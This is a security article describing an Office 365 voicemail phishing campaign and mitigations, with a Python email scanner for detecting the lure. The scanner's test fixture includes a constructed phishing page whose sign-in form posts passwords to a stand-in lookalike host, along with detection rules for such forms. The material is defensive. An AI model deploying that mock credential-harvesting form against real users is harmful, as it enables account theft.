How to Avoid the Recent Office 365 Phishing Campaign

An Office 365 phishing campaign has been running for the last few weeks that uses fake voicemail notifications to lure users into divulging their Office 365 account credentials. The details of the campaign are given below, together with some of the most frequent Office 365 mistakes that heighten the risk of an expensive data breach and HIPAA penalty.

Office 365 Voicemail Phishing Scam
Researchers at McAfee discovered the Office 365 voicemail phishing scam. The scam has been running for a few weeks, and most victims are middle managers and executives at high-profile businesses. A wide range of industries, including healthcare, has already been targeted; however, most of the attacks were on companies in the service, IT services, and retail industries.

The email messages appear to come from Microsoft and advise Office 365 users that they have a new voicemail message. The messages include a reference number, the caller’s phone number, the date of the call, and the length of the voicemail. They appear to be automated and urge the recipient to view the message promptly.

The phishing emails carry an HTML attachment that, when opened, plays a brief excerpt of the voicemail. Users are then redirected to a fake Office 365 website, where they are told to enter their Office 365 credentials in order to hear the complete message; those credentials are captured by the attacker. Users are finally redirected to the real Office.com site, but no voicemail message is played.

This is not the first time attackers have used voicemail and missed-call alerts as bait in phishing attacks; however, the use of audio recordings in phishing emails is unusual. The voicemail excerpt is an embedded .wav file contained in the HTML attachment.
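The two traits described above (an HTML attachment carrying an embedded audio clip, and a sign-in form inside that attachment that posts to a host outside Microsoft's sign-in domains) are things a mail gateway or an analyst can check for mechanically. The following scanner is an added example, not code from the article or from McAfee: it parses a raw RFC 822 message with Python's standard `email` library, inspects every `text/html` attachment, and reports audio `data:` URIs, password fields, and credential forms whose action points at an untrusted host. The sample message, the attachment, the `.invalid` hostnames and the `TRUSTED_SIGNIN_HOSTS` list are all constructed for illustration and are assumptions of this example.

```python
import base64
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the sign-in hosts an organisation treats as legitimate for Office 365.
TRUSTED_SIGNIN_HOSTS = ("login.microsoftonline.com", "login.live.com")

# Constructed sample (not a real campaign artifact): a few bytes standing in for a
# .wav file, embedded as a data: URI, plus a sign-in form posting to a lookalike host.
FAKE_WAV = base64.b64encode(b"RIFF....WAVEfmt ").decode()
SAMPLE_HTML = f"""<html><body>
<p>You have a new voicemail. Listen to the preview and sign in to hear the full message.</p>
<audio autoplay src="data:audio/wav;base64,{FAKE_WAV}"></audio>
<form method="post" action="https://example-login.invalid/office365">
  <input name="email" type="text"><input name="pwd" type="password">
</form></body></html>"""

# Constructed raw message wrapping the HTML above as a base64-encoded attachment.
SAMPLE_EML = f"""From: "Microsoft" <no-reply@example.invalid>
To: user@victim.invalid
Subject: New voicemail message
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

You have a new voicemail. Open the attachment to listen.
--b1
Content-Type: text/html; name="voicemail.html"
Content-Disposition: attachment; filename="voicemail.html"
Content-Transfer-Encoding: base64

{base64.b64encode(SAMPLE_HTML.encode()).decode()}
--b1--
"""


class _SignInFormScanner(HTMLParser):
    """Collects audio sources, form actions and password inputs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.audio_srcs = []
        self.form_actions = []
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes such as autoplay
        if tag in ("audio", "source") and a.get("src"):
            self.audio_srcs.append(a["src"])
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1


def _is_trusted_host(host: str) -> bool:
    # Exact match or a subdomain of a trusted host; "xlogin.microsoftonline.com" must not pass.
    return any(host == h or host.endswith("." + h) for h in TRUSTED_SIGNIN_HOSTS)


def scan_html_attachment(html: str) -> list:
    """Return human-readable findings for one HTML attachment (empty list if clean)."""
    scanner = _SignInFormScanner()
    scanner.feed(html)
    findings = []
    if any(src.startswith("data:audio/") for src in scanner.audio_srcs):
        findings.append("embedded audio clip (data: URI) in HTML attachment")
    if scanner.password_inputs:
        findings.append("password field in HTML attachment")
    for action in scanner.form_actions:
        host = urlparse(action).hostname or ""
        if host and not _is_trusted_host(host):
            findings.append(f"credential form posts to untrusted host {host}")
    return findings


def scan_message(raw: str) -> dict:
    """Map each suspicious HTML attachment's filename to its findings."""
    msg = message_from_string(raw)
    results = {}
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        if part.get_content_disposition() != "attachment":
            continue  # inline HTML bodies are normal; only attached HTML files are of interest
        payload = part.get_payload(decode=True) or b""
        html = payload.decode(part.get_content_charset() or "utf-8", errors="replace")
        findings = scan_html_attachment(html)
        if findings:
            results[part.get_filename() or "<unnamed>"] = findings
    return results


if __name__ == "__main__":
    for name, hits in scan_message(SAMPLE_EML).items():
        print(name)
        for hit in hits:
            print("  -", hit)
```

Any one finding alone is not proof of phishing (legitimate HTML newsletters embed media, and some vendors do attach HTML files), but an attached HTML file that both plays audio and collects a password for a non-Microsoft host matches this campaign closely enough to quarantine for review.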

According to McAfee’s report, three distinct phishing kits are being used to build the spoofed Microsoft Office 365 sites, which implies that three threat groups are running this scheme.

There are warning signs that should alert security-aware staff that this is a fraud. However, unfamiliarity with this kind of phishing scheme, combined with the use of Microsoft trademarks and carbon-copy Office 365 sign-in pages, persuades account holders that the voicemail alerts are authentic.

Phishing campaigns targeting Office 365 users are increasing. To reduce the risk that such campaigns succeed because of avoidable Office 365 user and configuration mistakes, the following steps should be taken:

  • Use a third-party anti-phishing solution in addition to Office 365’s built-in anti-spam and anti-phishing protection
  • Use multi-factor authentication so that compromised credentials alone cannot be used to access Office 365 email accounts
  • Review the DHS Cybersecurity and Infrastructure Security Agency advice before migrating from on-premises mail services to Office 365, to avoid known vulnerabilities and threats
  • Enable logging and monitor email logs consistently for indications of unauthorized access and questionable employee behavior
  • Use email encryption to prevent interception of ePHI in transit
  • Read your Business Associate Agreement and make sure that you are using Office 365 in a manner that is compliant with HIPAA
  • Back up your Office 365 environment in case you need to recover data, and use email archiving in case it is required for legal discovery or compliance audits.